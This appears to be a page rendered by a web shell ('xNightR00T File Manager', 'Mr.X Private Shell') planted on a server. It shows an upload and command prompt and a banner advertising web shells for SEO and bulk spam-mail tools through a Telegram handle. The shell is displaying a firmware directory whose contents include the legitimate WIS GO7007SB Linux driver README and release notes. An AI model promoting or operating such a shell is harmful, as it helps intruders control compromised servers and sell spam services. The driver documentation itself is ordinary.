xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
The README file from the original package from Micronas appears below. Only
the part about the firmware redistribution in section 0 is relevant, all
other sections are completely obsolete.

---------------------------------------------------------------------------
                     WIS GO7007SB Public Linux Driver
---------------------------------------------------------------------------


*** Please see the file RELEASE-NOTES for important last-minute updates ***


  0. OVERVIEW AND LICENSING/DISCLAIMER


This driver kit contains Linux drivers for the WIS GO7007SB multi-format
video encoder.  Only kernel version 2.6.x is supported.  The video stream
is available through the Video4Linux2 API and the audio stream is available
through the ALSA API (or the OSS emulation layer of the ALSA system).

The files in kernel/ and hotplug/ are licensed under the GNU General Public
License Version 2 from the Free Software Foundation.  A copy of the license
is included in the file COPYING.

The example applications in apps/ and C header files in include/ are
licensed under a permissive license included in the source files which
allows copying, modification and redistribution for any purpose without
attribution.

The firmware files included in the firmware/ directory may be freely
redistributed only in conjunction with this document; but modification,
tampering and reverse engineering are prohibited.

MICRONAS USA, INC., MAKES NO WARRANTIES TO ANY PERSON OR ENTITY WITH
RESPECT TO THE SOFTWARE OR ANY DERIVATIVES THEREOF OR ANY SERVICES OR
LICENSES AND DISCLAIMS ALL IMPLIED WARRANTIES, INCLUDING WITHOUT LIMITATION
WARRANTIES OF MERCHANTABILITY, SUPPORT, AND FITNESS FOR A PARTICULAR
PURPOSE AND NON-INFRINGEMENT.


  1. SYSTEM REQUIREMENTS


This driver requires Linux kernel 2.6.  Kernel 2.4 is not supported.  Using
kernel 2.6.10 or later is recommended, as earlier kernels are known to have
unstable USB 2.0 support.

A fully built kernel source tree must be available.  Typically this will be
linked from "/lib/modules/<KERNEL VERSION>/build" for convenience.  If this
link does not exist, an extra parameter will need to be passed to the
`make` command.

All vendor-built kernels should already be configured properly.  However,
for custom-built kernels, the following options need to be enabled in the
kernel as built-in or modules:

        CONFIG_HOTPLUG           - Support for hot-pluggable devices
        CONFIG_MODULES           - Enable loadable module support
        CONFIG_KMOD              - Automatic kernel module loading
        CONFIG_FW_LOADER         - Hotplug firmware loading support
        CONFIG_I2C               - I2C support
        CONFIG_VIDEO_DEV         - Video For Linux
        CONFIG_SOUND             - Sound card support
        CONFIG_SND               - Advanced Linux Sound Architecture
        CONFIG_USB               - Support for Host-side USB
        CONFIG_USB_DEVICEFS      - USB device filesystem
        CONFIG_USB_EHCI_HCD      - EHCI HCD (USB 2.0) support

Additionally, to use the example application, the following options need to
be enabled in the ALSA section:

        CONFIG_SND_MIXER_OSS     - OSS Mixer API
        CONFIG_SND_PCM_OSS       - OSS PCM (digital audio) API

The hotplug scripts, along with the fxload utility, must also be installed.
These scripts can be obtained from <http://linux-hotplug.sourceforge.net/>.
Hotplugging is used for loading firmware into the Cypruss EZ-USB chip using
fxload and for loading firmware into the driver using the firmware agent.


  2. COMPILING AND INSTALLING THE DRIVER


Most users should be able to compile the driver by simply running:

        $ make

in the top-level directory of the driver kit.  First the kernel modules
will be built, followed by the example applications.

If the build system is unable to locate the kernel source tree for the
currently-running kernel, or if the module should be built for a kernel
other than the currently-running kernel, an additional parameter will need
to be passed to make to specify the appropriate kernel source directory:

        $ make KERNELSRC=/usr/src/linux-2.6.10-custom3

Once the compile completes, the driver and firmware files should be
installed by running:

        $ make install

The kernel modules will be placed in "/lib/modules/<KERNEL VERSION>/extra"
and the firmware files will be placed in the appropriate hotplug firmware
directory, usually /lib/firmware.  In addition, USB maps and scripts will
be placed in /etc/hotplug/usb to enable fxload to initialize the EZ-USB
control chip when the device is connected.


  3. PAL/SECAM TUNER CONFIGURATION (TV402U-EU only)


The PAL model of the Plextor ConvertX TV402U may require additional
configuration to correctly select the appropriate TV frequency band and
audio subchannel.

Users with a device other than the Plextor ConvertX TV402U-EU should skip
this section.

The wide variety of PAL TV systems used in Europe requires that additional
information about the local TV standards be passed to the driver in order
to properly tune TV channels.  The two necessary parameters are (a) the PAL
TV band, and (b) the audio subchannel format in use.

In many cases, the appropriate TV band selection is passed to the driver
from applications.  However, in some cases, the application only specifies
that the driver should use PAL but not the specific information about the
appropriate TV band.  To work around this issue, the correct TV band may be
specified in the "force_band" parameter to the wis-sony-tuner module:

     TV band           force_band
     -------           ----------
     PAL B/G                B
     PAL I                  I
     PAL D/K                D
     SECAM L                L

If the "force_band" parameter is specified, the driver will ignore any TV
band specified by applications and will always use the band provided in the
module parameter.

The other parameter that can be specified is the audio subchannel format.
There are several stereo audio carrier systems in use, including NICAM and
three varieties of A2.  To receive audio broadcast on one of these stereo
carriers, the "force_mpx_mode" parameter must be specified to the
wis-sony-tuner module.

     TV band           Audio subcarrier       force_mpx_mode
     -------           ----------------       --------------
     PAL B/G            Mono (default)               1
     PAL B/G                  A2                     2
     PAL B/G                 NICAM                   3
     PAL I              Mono (default)               4
     PAL I                   NICAM                   5
     PAL D/K            Mono (default)               6
     PAL D/K                 A2 (1)                  7
     PAL D/K                 A2 (2)                  8
     PAL D/K                 A2 (3)                  9
     PAL D/K                 NICAM                  10
     SECAM L            Mono (default)              11
     SECAM L                 NICAM                  12

If the "force_mpx_mode" parameter is not specified, the correct mono-only
mode will be chosen based on the TV band.  However, the tuner will not
receive stereo audio or bilingual broadcasts correctly.

To pass the "force_band" or "force_mpx_mode" parameters to the
wis-sony-tuner module, the following line must be added to the modprobe
configuration file, which varies from one Linux distribution to another.

     options wis-sony-tuner force_band=B force_mpx_mode=2

The above example would force the tuner to the PAL B/G TV band and receive
stereo audio broadcasts on the A2 carrier.

To verify that the configuration has been placed in the correct location,
execute:

        $ modprobe -c | grep wis-sony-tuner

If the configuration line appears, then modprobe will pass the parameters
correctly the next time the wis-sony-tuner module is loaded into the
kernel.


  4. TESTING THE DRIVER


Because few Linux applications are able to correctly capture from
Video4Linux2 devices with only compressed formats supported, the new driver
should be tested with the "gorecord" application in the apps/ directory.

First connect a video source to the device, such as a DVD player or VCR.
This will be captured to a file for testing the driver.  If an input source
is unavailable, a test file can still be captured, but the video will be
black and the audio will be silent.

This application will auto-detect the V4L2 and ALSA/OSS device names of the
hardware and will record video and audio to an AVI file for a specified
number of seconds.  For example:

        $ apps/gorecord -duration 60 capture.avi

If this application does not successfully record an AVI file, the error
messages produced by gorecord and recorded in the system log (usually in
/var/log/messages) should provide information to help resolve the problem.

Supplying no parameters to gorecord will cause it to probe the available
devices and exit.  Use the -help flag for usage information.


  5. USING THE DRIVER


The V4L2 device implemented by the driver provides a standard compressed
format API, within the following criteria:

  * Applications that only support the original Video4Linux1 API will not
    be able to communicate with this driver at all.

  * No raw video modes are supported, so applications like xawtv that
    expect only uncompressed video will not function.

  * Supported compression formats are: Motion-JPEG, MPEG1, MPEG2 and MPEG4.

  * MPEG video formats are delivered as Video Elementary Streams only.
    Program Stream (PS), Transport Stream (TS) and Packetized Elementary
    Stream (PES) formats are not supported.

  * Video parameters such as format and input port may not be changed while
    the encoder is active.

  * The audio capture device only functions when the video encoder is
    actively capturing video.  Attempts to read from the audio device when
    the encoder is inactive will result in an I/O error.

  * The native format of the audio device is 48Khz 2-channel 16-bit
    little-endian PCM, delivered through the ALSA system.  No audio
    compression is implemented in the hardware.  ALSA may convert to other
    uncompressed formats on the fly.

The include/ directory contains a C header file describing non-standard
features of the GO7007SB encoder, which are described below:


  GO7007IOC_S_COMP_PARAMS, GO7007IOC_G_COMP_PARAMS

    These ioctls are used to negotiate general compression parameters.

    To query the current parameters, call the GO7007IOC_G_COMP_PARAMS ioctl
    with a pointer to a struct go7007_comp_params.  If the driver is not
    set to MPEG format, the EINVAL error code will be returned.

    To change the current parameters, initialize all fields of a struct
    go7007_comp_params and call the GO7007_IOC_S_COMP_PARAMS ioctl with a
    pointer to this structure.  The driver will return the current
    parameters with any necessary changes to conform to the limitations of
    the hardware or current compression mode.  Any or all fields can be set
    to zero to request a reasonable default value.  If the driver is not
    set to MPEG format, the EINVAL error code will be returned.  When I/O
    is in progress, the EBUSY error code will be returned.

    Fields in struct go7007_comp_params:

        __u32                        The maximum number of frames in each
          gop_size                   Group Of Pictures; i.e. the maximum
                                     number of frames minus one between
                                     each key frame.

        __u32                        The maximum number of sequential
          max_b_frames               bidirectionally-predicted frames.
                                     (B-frames are not yet supported.)

        enum go7007_aspect_ratio     The aspect ratio to be encoded in the
          aspect_ratio               meta-data of the compressed format.

                                     Choices are:
                                        GO7007_ASPECT_RATIO_1_1
                                        GO7007_ASPECT_RATIO_4_3_NTSC
                                        GO7007_ASPECT_RATIO_4_3_PAL
                                        GO7007_ASPECT_RATIO_16_9_NTSC
                                        GO7007_ASPECT_RATIO_16_9_PAL

        __u32                        Bit-wise OR of control flags (below)
          flags

    Flags in struct go7007_comp_params:

        GO7007_COMP_CLOSED_GOP       Only produce self-contained GOPs, used
                                     to produce streams appropriate for
                                     random seeking.

        GO7007_COMP_OMIT_SEQ_HEADER  Omit the stream sequence header.


  GO7007IOC_S_MPEG_PARAMS, GO7007IOC_G_MPEG_PARAMS

    These ioctls are used to negotiate MPEG-specific stream parameters when
    the pixelformat has been set to V4L2_PIX_FMT_MPEG.

    To query the current parameters, call the GO7007IOC_G_MPEG_PARAMS ioctl
    with a pointer to a struct go7007_mpeg_params.  If the driver is not
    set to MPEG format, the EINVAL error code will be returned.

    To change the current parameters, initialize all fields of a struct
    go7007_mpeg_params and call the GO7007_IOC_S_MPEG_PARAMS ioctl with a
    pointer to this structure.  The driver will return the current
    parameters with any necessary changes to conform to the limitations of
    the hardware or selected MPEG mode.  Any or all fields can be set to
    zero to request a reasonable default value.  If the driver is not set
    to MPEG format, the EINVAL error code will be returned.  When I/O is in
    progress, the EBUSY error code will be returned.

    Fields in struct go7007_mpeg_params:

        enum go7007_mpeg_video_standard
          mpeg_video_standard        The MPEG video standard in which to
                                     compress the video.

                                     Choices are:
                                        GO7007_MPEG_VIDEO_MPEG1
                                        GO7007_MPEG_VIDEO_MPEG2
                                        GO7007_MPEG_VIDEO_MPEG4

        __u32                        Bit-wise OR of control flags (below)
          flags

        __u32                        The profile and level indication to be
          pali                       stored in the sequence header.  This
                                     is only used as an indicator to the
                                     decoder, and does not affect the MPEG
                                     features used in the video stream.
                                     Not valid for MPEG1.

                                     Choices for MPEG2 are:
                                        GO7007_MPEG2_PROFILE_MAIN_MAIN

                                     Choices for MPEG4 are:
                                        GO7007_MPEG4_PROFILE_S_L0
                                        GO7007_MPEG4_PROFILE_S_L1
                                        GO7007_MPEG4_PROFILE_S_L2
                                        GO7007_MPEG4_PROFILE_S_L3
                                        GO7007_MPEG4_PROFILE_ARTS_L1
                                        GO7007_MPEG4_PROFILE_ARTS_L2
                                        GO7007_MPEG4_PROFILE_ARTS_L3
                                        GO7007_MPEG4_PROFILE_ARTS_L4
                                        GO7007_MPEG4_PROFILE_AS_L0
                                        GO7007_MPEG4_PROFILE_AS_L1
                                        GO7007_MPEG4_PROFILE_AS_L2
                                        GO7007_MPEG4_PROFILE_AS_L3
                                        GO7007_MPEG4_PROFILE_AS_L4
                                        GO7007_MPEG4_PROFILE_AS_L5

    Flags in struct go7007_mpeg_params:

        GO7007_MPEG_FORCE_DVD_MODE   Force all compression parameters and
                                     bitrate control settings to comply
                                     with DVD MPEG2 stream requirements.
                                     This overrides most compression and
                                     bitrate settings!

        GO7007_MPEG_OMIT_GOP_HEADER  Omit the GOP header.

        GO7007_MPEG_REPEAT_SEQHEADER Repeat the MPEG sequence header at
                                     the start of each GOP.


  GO7007IOC_S_BITRATE, GO7007IOC_G_BITRATE

    These ioctls are used to set and query the target bitrate value for the
    compressed video stream.  The bitrate may be selected by storing the
    target bits per second in an int and calling GO7007IOC_S_BITRATE with a
    pointer to the int.  The bitrate may be queried by calling
    GO7007IOC_G_BITRATE with a pointer to an int where the current bitrate
    will be stored.

    Note that this is the primary means of controlling the video quality
    for all compression modes, including V4L2_PIX_FMT_MJPEG.  The
    VIDIOC_S_JPEGCOMP ioctl is not supported.


----------------------------------------------------------------------------
                   Installing the WIS PCI Voyager Driver
---------------------------------------------------------------------------

The WIS PCI Voyager driver requires several patches to the Linux 2.6.11.x
kernel source tree before compiling the driver.  These patches update the
in-kernel SAA7134 driver to the newest development version and patch bugs
in the TDA8290/TDA8275 tuner driver.

The following patches must be downloaded from Gerd Knorr's website and
applied in the order listed:

	http://dl.bytesex.org/patches/2.6.11-2/i2c-tuner
	http://dl.bytesex.org/patches/2.6.11-2/i2c-tuner2
	http://dl.bytesex.org/patches/2.6.11-2/v4l2-api-mpeg
	http://dl.bytesex.org/patches/2.6.11-2/saa7134-update

The following patches are included with this SDK and can be applied in any
order:

	patches/2.6.11/saa7134-voyager.diff
	patches/2.6.11/tda8275-newaddr.diff
	patches/2.6.11/tda8290-ntsc.diff

Check to make sure the CONFIG_VIDEO_SAA7134 option is enabled in the kernel
configuration, and build and install the kernel.

After rebooting into the new kernel, the GO7007 driver can be compiled and
installed:

	$ make SAA7134_BUILD=y
	$ make install
	$ modprobe saa7134-go7007

There will be two V4L video devices associated with the PCI Voyager.  The
first device (most likely /dev/video0) provides access to the raw video
capture mode of the SAA7133 device and is used to configure the source
video parameters and tune the TV tuner.  This device can be used with xawtv
or other V4L(2) video software as a standard uncompressed device.

The second device (most likely /dev/video1) provides access to the
compression functions of the GO7007.  It can be tested using the gorecord
application in the apps/ directory of this SDK:

	$ apps/gorecord -vdevice /dev/video1 -noaudio test.avi

Currently the frame resolution is fixed at 720x480 (NTSC) or 720x576 (PAL),
and the video standard must be specified to both the raw and the compressed
video devices (xawtv and gorecord, for example).


--------------------------------------------------------------------------
RELEASE NOTES FOR WIS GO7007SB LINUX DRIVER
---------------------------------------------------------------------------

Last updated: 5 November 2005

 - Release 0.9.7 includes new support for using udev to run fxload.  The
   install script should automatically detect whether the old hotplug
   scripts or the new udev rules should be used.  To force the use of
   hotplug, run "make install USE_UDEV=n".  To force the use of udev, run
   "make install USE_UDEV=y".

 - Motion detection is supported but undocumented.  Try the `modet` app
   for a demonstration of how to use the facility.

 - Using USB2.0 devices such as the TV402U with USB1.1 HCDs or hubs can
   cause buffer overruns and frame drops, even at low framerates, due to
   inconsistency in the bitrate control mechanism.

 - On devices with an SAA7115, including the Plextor ConvertX, video height
   values of 96, 128, 160, 192, 256, 320, and 384 do not work in NTSC mode.
   All valid heights up to 512 work correctly in PAL mode.

 - The WIS Star Trek and PCI Voyager boards have no support yet for audio
   or the TV tuner.

Filemanager

Name Type Size Permission Actions
3com Folder 0755
RTL8192E Folder 0755
acenic Folder 0755
adaptec Folder 0755
advansys Folder 0755
amd Folder 0755
amdgpu Folder 0755
ar3k Folder 0755
ath10k Folder 0755
ath6k Folder 0755
ath9k_htc Folder 0755
atmel Folder 0755
atusb Folder 0755
av7110 Folder 0755
bnx2 Folder 0755
bnx2x Folder 0755
brcm Folder 0755
cadence Folder 0755
cavium Folder 0755
cis Folder 0755
cpia2 Folder 0755
cxgb3 Folder 0755
cxgb4 Folder 0755
dabusb Folder 0755
dpaa2 Folder 0755
dsp56k Folder 0755
e100 Folder 0755
edgeport Folder 0755
emi26 Folder 0755
emi62 Folder 0755
ene-ub6250 Folder 0755
ess Folder 0755
go7007 Folder 0755
i915 Folder 0755
imx Folder 0755
intel Folder 0755
intel-ucode Folder 0755
isci Folder 0755
kaweth Folder 0755
keyspan Folder 0755
keyspan_pda Folder 0755
korg Folder 0755
libertas Folder 0755
liquidio Folder 0755
matrox Folder 0755
mediatek Folder 0755
mellanox Folder 0755
meson Folder 0755
microchip Folder 0755
moxa Folder 0755
mrvl Folder 0755
mwl8k Folder 0755
mwlwifi Folder 0755
myricom Folder 0755
netronome Folder 0755
nvidia Folder 0755
ositech Folder 0755
qca Folder 0755
qcom Folder 0755
qed Folder 0755
qlogic Folder 0755
r128 Folder 0755
radeon Folder 0755
rockchip Folder 0755
rsi Folder 0755
rtl_bt Folder 0755
rtl_nic Folder 0755
rtlwifi Folder 0755
rtw88 Folder 0755
sb16 Folder 0755
slicoss Folder 0755
sun Folder 0755
sxg Folder 0755
tehuti Folder 0755
ti-connectivity Folder 0755
ti-keystone Folder 0755
tigon Folder 0755
ttusb-budget Folder 0755
ueagle-atm Folder 0755
usbdux Folder 0755
vicam Folder 0755
vxge Folder 0755
yam Folder 0755
yamaha Folder 0755
GPL-2 File 17.67 KB 0644
GPL-3 File 34.25 KB 0644
LICENCE.Abilis File 1.05 KB 0644
LICENCE.IntcSST2 File 1.99 KB 0644
LICENCE.Marvell File 1.13 KB 0644
LICENCE.Netronome File 3.54 KB 0644
LICENCE.OLPC File 1.74 KB 0644
LICENCE.adsp_sst File 47.23 KB 0644
LICENCE.agere File 3.46 KB 0644
LICENCE.atheros_firmware File 1.9 KB 0644
LICENCE.broadcom_bcm43xx File 4.08 KB 0644
LICENCE.ca0132 File 2.44 KB 0644
LICENCE.cadence File 2.8 KB 0644
LICENCE.cavium File 3.62 KB 0644
LICENCE.cavium_liquidio File 25.96 KB 0644
LICENCE.chelsio_firmware File 1.45 KB 0644
LICENCE.cw1200 File 1.91 KB 0644
LICENCE.cypress File 8.71 KB 0644
LICENCE.e100 File 1.46 KB 0644
LICENCE.ene_firmware File 738 B 0644
LICENCE.fw_sst_0f28 File 1.85 KB 0644
LICENCE.go7007 File 19.74 KB 0644
LICENCE.i2400m File 1.84 KB 0644
LICENCE.ibt_firmware File 1.99 KB 0644
LICENCE.it913x File 851 B 0644
LICENCE.iwlwifi_firmware File 2 KB 0644
LICENCE.kaweth File 1.56 KB 0644
LICENCE.mediatek File 561 B 0644
LICENCE.microchip File 2.28 KB 0644
LICENCE.moxa File 892 B 0644
LICENCE.myri10ge_firmware File 1.42 KB 0644
LICENCE.nvidia File 6.07 KB 0644
LICENCE.open-ath9k-htc-firmware File 9.19 KB 0644
LICENCE.phanfw File 1.83 KB 0644
LICENCE.qat_firmware File 1.99 KB 0644
LICENCE.qla1280 File 1.35 KB 0644
LICENCE.qla2xxx File 1.8 KB 0644
LICENCE.r8a779x_usb3 File 1.42 KB 0644
LICENCE.ralink-firmware.txt File 2.05 KB 0644
LICENCE.ralink_a_mediatek_company_firmware File 2.05 KB 0644
LICENCE.rockchip File 2.06 KB 0644
LICENCE.rtlwifi_firmware.txt File 2.07 KB 0644
LICENCE.siano File 1.42 KB 0644
LICENCE.tda7706-firmware.txt File 2.13 KB 0644
LICENCE.ti-connectivity File 2.84 KB 0644
LICENCE.ti-keystone File 2.84 KB 0644
LICENCE.ueagle-atm4-firmware File 2 KB 0644
LICENCE.via_vt6656 File 1.23 KB 0644
LICENCE.wl1251 File 2.83 KB 0644
LICENCE.xc4000 File 1.16 KB 0644
LICENCE.xc5000 File 1.15 KB 0644
LICENCE.xc5000c File 1.2 KB 0644
LICENSE.QualcommAtheros_ar3k File 2.64 KB 0644
LICENSE.QualcommAtheros_ath10k File 2.65 KB 0644
LICENSE.amd-sev File 3.67 KB 0644
LICENSE.amdgpu File 2.87 KB 0644
LICENSE.amlogic_vdec File 756 B 0644
LICENSE.atmel File 2.05 KB 0644
LICENSE.dib0700 File 1.01 KB 0644
LICENSE.hfi1_firmware File 1.86 KB 0644
LICENSE.i915 File 2.03 KB 0644
LICENSE.ipu3_firmware File 1.83 KB 0644
LICENSE.ipw2200-fw File 11.73 KB 0644
LICENSE.ipw2x00 File 11.6 KB 0644
LICENSE.nxp_mc_firmware File 7.09 KB 0644
LICENSE.qcom File 13.63 KB 0644
LICENSE.radeon File 2.87 KB 0644
LICENSE.sdma_firmware File 2.54 KB 0644
Makefile File 397 B 0644
README File 1.64 KB 0644
TDA7706_OM_v2.5.1_boot.txt File 36.16 KB 0644
TDA7706_OM_v3.0.2_boot.txt File 10.26 KB 0644
a300_pfp.fw File 1.13 KB 0644
a300_pm4.fw File 9 KB 0644
agere_ap_fw.bin File 49.51 KB 0644
agere_sta_fw.bin File 63.52 KB 0644
aic94xx-seq.fw File 22.09 KB 0644
ar5523.bin File 149.82 KB 0644
ar7010.fw File 68.97 KB 0644
ar7010_1_1.fw File 68.97 KB 0644
ar9170-1.fw File 82 KB 0644
ar9170-2.fw File 3.43 KB 0644
ar9271.fw File 50.11 KB 0644
as102_data1_st.hex File 93.26 KB 0644
as102_data2_st.hex File 79.9 KB 0644
ast_dp501_fw.bin File 26.18 KB 0644
ath3k-1.fw File 241.02 KB 0644
atmel_at76c502-wpa.bin File 34.45 KB 0644
atmel_at76c502.bin File 31.02 KB 0644
atmel_at76c502_3com-wpa.bin File 34.36 KB 0644
atmel_at76c502_3com.bin File 29.64 KB 0644
atmel_at76c502d-wpa.bin File 34.45 KB 0644
atmel_at76c502d.bin File 31.02 KB 0644
atmel_at76c502e-wpa.bin File 34.45 KB 0644
atmel_at76c502e.bin File 31.03 KB 0644
atmel_at76c503-i3861.bin File 27.5 KB 0644
atmel_at76c503-i3863.bin File 27.38 KB 0644
atmel_at76c503-rfmd-0.90.2-140.bin File 34.54 KB 0644
atmel_at76c503-rfmd-acc.bin File 36.92 KB 0644
atmel_at76c503-rfmd.bin File 37.07 KB 0644
atmel_at76c504.bin File 31 KB 0644
atmel_at76c504_2958-wpa.bin File 34.36 KB 0644
atmel_at76c504a_2958-wpa.bin File 38.99 KB 0644
atmel_at76c504c-wpa.bin File 34.37 KB 0644
atmel_at76c505-rfmd.bin File 34.7 KB 0644
atmel_at76c505-rfmd2958.bin File 36.13 KB 0644
atmel_at76c505a-rfmd2958.bin File 36.14 KB 0644
atmel_at76c506-wpa.bin File 34.4 KB 0644
atmel_at76c506.bin File 31.08 KB 0644
atmsar11.fw File 9.5 KB 0644
bnx2x-e1-4.8.53.0.fw File 161.88 KB 0644
bnx2x-e1-5.2.13.0.fw File 159.18 KB 0644
bnx2x-e1-5.2.7.0.fw File 158.98 KB 0644
bnx2x-e1h-4.8.53.0.fw File 187.89 KB 0644
bnx2x-e1h-5.2.13.0.fw File 200.7 KB 0644
bnx2x-e1h-5.2.7.0.fw File 200.67 KB 0644
carl9170-1.fw File 13.07 KB 0644
cbfw-3.2.1.1.bin File 402.86 KB 0644
cbfw-3.2.3.0.bin File 404.31 KB 0644
cbfw-3.2.5.1.bin File 404.77 KB 0644
cmmb_vega_12mhz.inp File 61.31 KB 0644
cmmb_venice_12mhz.inp File 94.74 KB 0644
configure File 107 B 0644
ct2fw-3.2.1.1.bin File 568.79 KB 0644
ct2fw-3.2.3.0.bin File 570.01 KB 0644
ct2fw-3.2.5.1.bin File 570.52 KB 0644
ctfw-3.2.1.1.bin File 524.57 KB 0644
ctfw-3.2.3.0.bin File 526.09 KB 0644
ctfw-3.2.5.1.bin File 526.51 KB 0644
dvb-fe-xc4000-1.4.1.fw File 18.21 KB 0644
dvb-fe-xc5000-1.6.114.fw File 12.11 KB 0644
dvb-fe-xc5000c-4.1.30.7.fw File 16.11 KB 0644
dvb-usb-dib0700-1.20.fw File 32.98 KB 0644
dvb-usb-it9135-01.fw File 7.94 KB 0644
dvb-usb-it9135-02.fw File 5.7 KB 0644
dvb-usb-terratec-h5-drxk.fw File 49.04 KB 0644
dvb_nova_12mhz.inp File 91.32 KB 0644
dvb_nova_12mhz_b0.inp File 99.5 KB 0644
f2255usb.bin File 177.06 KB 0644
hfi1_dc8051.fw File 31.59 KB 0644
hfi1_fabric.fw File 16.45 KB 0644
hfi1_pcie.fw File 32.52 KB 0644
hfi1_sbus.fw File 5.23 KB 0644
htc_7010.fw File 70.98 KB 0644
htc_9271.fw File 49.79 KB 0644
i2400m-fw-usb-1.4.sbcf File 1.19 MB 0644
i2400m-fw-usb-1.5.sbcf File 1.27 MB 0644
i6050-fw-usb-1.5.sbcf File 1.46 MB 0644
intelliport2.bin File 33.5 KB 0644
ipw-2.2-boot.fw File 6.32 KB 0644
ipw-2.2-bss.fw File 163.05 KB 0644
ipw-2.2-bss_ucode.fw File 15.95 KB 0644
ipw-2.2-ibss.fw File 157.78 KB 0644
ipw-2.2-ibss_ucode.fw File 15.93 KB 0644
ipw-2.3-boot.fw File 6.32 KB 0644
ipw-2.3-bss.fw File 163.05 KB 0644
ipw-2.3-bss_ucode.fw File 15.95 KB 0644
ipw-2.3-ibss.fw File 157.78 KB 0644
ipw-2.3-ibss_ucode.fw File 15.93 KB 0644
ipw-2.3-sniffer.fw File 161.16 KB 0644
ipw-2.3-sniffer_ucode.fw File 15.96 KB 0644
ipw-2.4-boot.fw File 6.32 KB 0644
ipw-2.4-bss.fw File 164.4 KB 0644
ipw-2.4-bss_ucode.fw File 15.95 KB 0644
ipw-2.4-ibss.fw File 159.07 KB 0644
ipw-2.4-ibss_ucode.fw File 15.93 KB 0644
ipw-2.4-sniffer.fw File 164.4 KB 0644
ipw-2.4-sniffer_ucode.fw File 15.96 KB 0644
ipw2100-1.3-i.fw File 196.42 KB 0644
ipw2100-1.3-p.fw File 191.85 KB 0644
ipw2100-1.3.fw File 204.29 KB 0644
ipw2200-bss.fw File 186.67 KB 0644
ipw2200-ibss.fw File 181.08 KB 0644
ipw2200-sniffer.fw File 183.43 KB 0644
isdbt_nova_12mhz.inp File 74.1 KB 0644
isdbt_nova_12mhz_b0.inp File 96.08 KB 0644
isdbt_rio.inp File 83.83 KB 0644
iwlwifi-100-5.ucode File 329.66 KB 0644
iwlwifi-1000-3.ucode File 327.2 KB 0644
iwlwifi-1000-5.ucode File 329.61 KB 0644
iwlwifi-105-6.ucode File 673.52 KB 0644
iwlwifi-135-6.ucode File 684.79 KB 0644
iwlwifi-2000-6.ucode File 679.57 KB 0644
iwlwifi-2030-6.ucode File 690.81 KB 0644
iwlwifi-3160-10.ucode File 595.6 KB 0644
iwlwifi-3160-12.ucode File 667.96 KB 0644
iwlwifi-3160-13.ucode File 672.48 KB 0644
iwlwifi-3160-16.ucode File 896.69 KB 0644
iwlwifi-3160-17.ucode File 896.75 KB 0644
iwlwifi-3160-7.ucode File 654.77 KB 0644
iwlwifi-3160-8.ucode File 651.64 KB 0644
iwlwifi-3160-9.ucode File 654.17 KB 0644
iwlwifi-3168-21.ucode File 1.32 MB 0644
iwlwifi-3168-22.ucode File 1004 KB 0644
iwlwifi-3168-27.ucode File 1008.24 KB 0644
iwlwifi-3168-29.ucode File 1011.99 KB 0644
iwlwifi-3945-2.ucode File 146.58 KB 0644
iwlwifi-4965-2.ucode File 183.57 KB 0644
iwlwifi-5000-1.ucode File 336.92 KB 0644
iwlwifi-5000-2.ucode File 344.96 KB 0644
iwlwifi-5000-5.ucode File 332.71 KB 0644
iwlwifi-5150-2.ucode File 329.49 KB 0644
iwlwifi-6000-4.ucode File 443.95 KB 0644
iwlwifi-6000g2a-5.ucode File 433.72 KB 0644
iwlwifi-6000g2a-6.ucode File 661.42 KB 0644
iwlwifi-6000g2b-5.ucode File 449.45 KB 0644
iwlwifi-6000g2b-6.ucode File 663.51 KB 0644
iwlwifi-6050-4.ucode File 452.82 KB 0644
iwlwifi-6050-5.ucode File 458.77 KB 0644
iwlwifi-7260-10.ucode File 656.59 KB 0644
iwlwifi-7260-12.ucode File 763.96 KB 0644
iwlwifi-7260-13.ucode File 768.48 KB 0644
iwlwifi-7260-16.ucode File 1 MB 0644
iwlwifi-7260-17.ucode File 1 MB 0644
iwlwifi-7260-7.ucode File 667.22 KB 0644
iwlwifi-7260-8.ucode File 663.85 KB 0644
iwlwifi-7260-9.ucode File 664.56 KB 0644
iwlwifi-7265-10.ucode File 719.57 KB 0644
iwlwifi-7265-12.ucode File 859.96 KB 0644
iwlwifi-7265-13.ucode File 864.48 KB 0644
iwlwifi-7265-16.ucode File 1.13 MB 0644
iwlwifi-7265-17.ucode File 1.13 MB 0644
iwlwifi-7265-8.ucode File 674.27 KB 0644
iwlwifi-7265-9.ucode File 681.47 KB 0644
iwlwifi-7265D-10.ucode File 719.57 KB 0644
iwlwifi-7265D-12.ucode File 979.3 KB 0644
iwlwifi-7265D-13.ucode File 985.05 KB 0644
iwlwifi-7265D-16.ucode File 1.32 MB 0644
iwlwifi-7265D-17.ucode File 1.32 MB 0644
iwlwifi-7265D-21.ucode File 1.32 MB 0644
iwlwifi-7265D-22.ucode File 1004.27 KB 0644
iwlwifi-7265D-27.ucode File 1008.54 KB 0644
iwlwifi-7265D-29.ucode File 1012.14 KB 0644
iwlwifi-8000C-13.ucode File 1.66 MB 0644
iwlwifi-8000C-16.ucode File 2.24 MB 0644
iwlwifi-8000C-21.ucode File 2.28 MB 0644
iwlwifi-8000C-22.ucode File 2.02 MB 0644
iwlwifi-8000C-27.ucode File 2.12 MB 0644
iwlwifi-8000C-31.ucode File 2.2 MB 0644
iwlwifi-8000C-34.ucode File 2.34 MB 0644
iwlwifi-8000C-36.ucode File 2.37 MB 0644
iwlwifi-8265-21.ucode File 2.28 MB 0644
iwlwifi-8265-22.ucode File 1.73 MB 0644
iwlwifi-8265-27.ucode File 2.13 MB 0644
iwlwifi-8265-31.ucode File 2.2 MB 0644
iwlwifi-8265-34.ucode File 2.33 MB 0644
iwlwifi-8265-36.ucode File 2.38 MB 0644
